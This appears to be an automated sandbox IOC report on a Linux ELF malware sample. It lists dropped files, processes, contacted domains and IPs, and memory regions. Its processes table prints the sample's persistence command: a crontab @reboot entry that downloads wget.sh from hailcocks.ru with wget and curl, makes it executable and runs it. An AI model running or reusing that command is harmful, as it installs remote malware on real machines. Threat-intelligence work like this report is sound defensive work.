IOC Report
x86.elf

loading gif

Files

File Path
Type
Category
Malicious
x86.elf
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.gD7MWz
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/x86.elf
/tmp/x86.elf
/tmp/x86.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/x86.elf
-

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
88.151.195.22
malicious

IPs

IP
Domain
Country
Malicious
194.87.198.29
unknown
Russian Federation
malicious
31.13.248.89
unknown
Bulgaria
malicious
88.151.195.22
kingstonwikkerink.dyn
Azerbaijan
malicious
193.233.193.45
unknown
Russian Federation
109.202.202.202
unknown
Switzerland
91.149.218.232
unknown
Poland
91.149.238.18
unknown
Poland
81.29.149.178
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
416000
page execute read
malicious
7ffe0dd4f000
page execute read
7ffe0dcda000
page read and write
517000
page read and write
51d000
page read and write
5bd000
page read and write